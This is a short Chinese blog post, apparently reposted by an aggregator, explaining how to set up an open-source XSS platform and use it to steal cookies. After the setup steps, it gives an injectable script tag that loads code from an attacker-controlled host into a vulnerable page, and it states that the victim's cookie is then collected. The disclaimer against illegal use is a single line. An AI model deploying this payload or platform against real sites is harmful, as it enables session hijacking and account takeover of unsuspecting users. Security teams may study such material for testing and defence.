XSS平台搭建及利用

Posted web安全工具库

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS平台搭建及利用相关的知识,希望对你有一定的参考价值。

​男孩子要娶,就要娶一见你就笑的女生,女孩子要嫁就要嫁能让你笑的男生。。。

----  网易云热评

一、下载平台源码、拷贝到我们网站的根目录

https://github.com/anwilx/xss_platform

二、修改相关参数

1、config.php,数据库用户、密码、还有xss平台的访问路径

2、导入sql文件,测试的时候没法导入,所以就手动创建了数据库

新建数据库

打开xssplatform.sql,将里面的sql语句执行一遍

3、更新站点域名,将作者的域名替换,一共有四处

将module模块里"http://xsser.me"替换为"http://www.aiyouxss.com/xss");

4、修改authtest文件

三、平台利用

1、注册一个账户

2、创建一个项目

3、配置相关信息,根据需要,添加模块

4、复制script里面代码,插入到存在xss漏洞的页面

<script src=http://192.168.139.129/xss/E3vbsa></script>

5、打开xss平台,已获取对方cookie

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

以上是关于XSS平台搭建及利用的主要内容,如果未能解决你的问题,请参考以下文章

搭建属于自己的xss平台

pikachu练习平台(XSS-漏洞测试案例(cookie的窃取和利用钓鱼攻击XSS获取键盘记录))

XSS平台搭建

XSS Platform本地搭建实例教程

《Web安全攻防》配套视频之XSS实验平台搭建

经验分享 | XSS手工利用方式